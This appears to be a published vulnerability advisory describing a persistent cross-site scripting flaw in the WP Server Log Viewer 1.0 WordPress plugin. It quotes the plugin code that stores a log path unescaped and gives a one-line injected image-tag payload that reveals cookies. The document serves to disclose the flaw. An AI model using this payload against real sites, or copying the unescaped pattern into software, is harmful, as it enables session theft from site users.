Share
# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting  
# Date: 2019-09-10  
# Exploit Author: strider  
# Software Link: https://github.com/anttiviljami/wp-server-log-viewer  
# Version: 1.0  
# Tested on: Debian 10 Buster x64 / Kali Linux  
# CVE : None  
  
====================================[Description]====================================  
This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.  
  
  
====================================[Codepart]====================================  
  
if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {  
// new log was added  
$logs = get_option( 'server_logs' );  
if( is_null( $logs ) ) {  
$logs = [];  
}  
  
$log = trim( $_GET['logpath'] ); //only trimmed string no escaping  
$logs[] = $log; //here the log will be added without security checks  
$logs = array_values( $logs );  
  
$index = array_search( $log, $logs );  
  
update_option( 'server_logs', $logs );  
  
wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );  
}  
  
  
  
====================================[Proof of Concept]====================================  
Add new log file to the plugin.  
paste this exploit into the form and submit it.  
  
<img src=# onerror=alert(document.cookie);>log.txt  
  
It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt